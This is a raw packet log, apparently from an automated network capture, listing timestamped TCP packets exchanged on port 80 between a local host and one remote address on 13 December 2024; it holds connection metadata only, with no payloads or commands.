                                          Dec 13, 2024 08:36:31.614404917 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.614507914 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.614568949 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.616935968 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.617037058 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.617058039 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.617127895 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.619515896 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.619563103 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.619591951 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.619630098 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.622077942 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.622136116 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.622176886 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.622216940 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.624686003 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.624742031 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.624798059 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.624847889 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.627238989 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.627326012 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.627358913 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.627588034 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.629774094 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.629825115 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.629861116 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.629915953 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.632335901 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.632410049 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.632440090 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.632672071 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.634921074 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.635190964 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.635355949 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.635432959 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.637439013 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.637567043 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.637595892 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.637610912 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.639997005 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.640059948 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.640096903 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.640156031 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.642561913 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.642612934 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.642627001 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.642669916 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.645147085 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.645250082 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.645281076 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.645308018 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.647680998 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.647772074 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.647775888 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.647819996 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.650254011 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.650324106 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.650760889 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.650811911 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.652759075 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.652883053 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.652936935 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.686589003 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.686937094 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.806663990 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.806746006 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.807087898 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.807262897 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.807749033 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.927642107 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.419584990 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.419620037 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.419635057 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.419702053 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.419723988 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.419734001 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.419737101 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.419744968 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.419750929 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.419756889 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.419848919 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.419934034 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.419940948 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.420037985 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.545064926 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.545123100 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.545279980 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.547261000 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.549629927 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.611264944 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.611377954 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.611381054 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.611445904 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.615461111 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.615525007 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.615602016 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.615648985 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.623888969 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.623904943 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.623948097 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.632256031 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.632318974 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.632344961 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.632376909 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.640834093 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.640966892 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.640991926 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.641011953 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.649151087 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.649235964 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.649282932 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.649326086 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.657501936 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.657557011 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.657645941 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.657802105 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.665885925 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.665985107 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.666055918 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.674374104 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.674464941 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.674540043 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.682769060 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.682806969 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.682868958 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.691132069 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.691203117 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.691245079 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.691292048 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.699378014 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.699450016 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.744730949 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.744749069 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.744919062 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.803308010 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.803380013 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.803495884 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.803684950 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.805721045 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.805753946 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.805778980 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.805803061 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.810477972 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.810535908 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.810597897 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.815285921 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.815445900 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.815473080 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.815521002 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.820103884 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.820178032 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.820331097 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.820331097 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.824846983 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.824939013 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.825016022 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.829482079 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.829593897 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.829612017 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.829653025 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.834177017 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.834268093 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.834317923 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.838880062 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.838932991 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.838959932 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.839000940 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.843549013 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.843708038 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.843766928 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.848279953 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.848331928 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.848356962 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.848401070 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.852936029 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.852992058 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.853035927 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.853080034 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.857641935 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.857691050 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.857736111 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.857775927 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.862297058 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.862380981 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.862427950 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.866991043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.867005110 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.867067099 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.871746063 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.871773005 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.871824980 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.871845961 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.876342058 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.876369953 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.876461983 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.876461983 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.880768061 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.880819082 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.880882025 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.880928993 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.885312080 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.885379076 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.885685921 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.885782957 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.889700890 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.889811993 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.889811993 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.889976978 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.894187927 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.894308090 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.894344091 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.894364119 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.898631096 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.898696899 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.898755074 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.898798943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.903059006 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.903450966 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.940217018 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.940288067 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.940290928 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.940335035 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.942425013 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.942492962 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.995402098 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.995443106 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.995502949 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.997100115 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.997255087 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.997304916 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.000622988 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.000684977 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.000705957 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.001030922 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.004168034 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.004234076 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.004265070 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.004307032 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.006865025 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.006952047 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.006980896 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.007021904 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.009536028 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.009571075 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.009586096 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.009629965 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.012181997 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.012240887 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.012269974 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.012310028 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.014786005 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.014858961 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.014884949 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.014928102 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.017378092 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.017431974 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.017586946 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.017631054 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.019948959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.019999027 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.020025969 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.020447969 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.022449017 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.022502899 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.022521019 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.022564888 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.024882078 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.025019884 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.025100946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.025100946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.027395964 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.027451992 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.027503014 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.029763937 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.029814005 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.029902935 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.029958010 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.032252073 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.032340050 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.032388926 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.034687996 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.034787893 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.034843922 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.037158012 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.037240982 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.037271023 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.037321091 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.039777994 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.039799929 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.039829969 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.039856911 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.042052984 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.042114973 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.042149067 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.042193890 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.044538975 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.044687033 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.044739008 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.046982050 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.047045946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.047092915 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.047142982 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.049412012 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.049475908 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.049511909 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.049560070 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.051868916 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.051938057 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.051948071 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.051995039 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.054354906 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.054408073 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.054408073 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.054450989 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.056754112 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.056854963 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.056905985 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.059220076 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.059262991 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.059318066 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.061629057 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.061690092 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.061721087 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.061767101 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.064100027 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.064157009 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.064188957 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.064234018 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.066553116 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.066622972 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.066656113 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.066700935 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.068793058 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.068901062 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.068959951 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.071032047 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.071103096 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.071139097 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.071187973 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.073323965 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.073384047 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.073396921 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.073443890 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.075614929 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.075663090 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.075664043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.075717926 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.077841043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.077903032 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.077904940 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.077953100 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.128725052 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.128786087 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.128835917 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.128876925 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.129839897 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.129890919 CET4977280192.168.2.480.82.65.70
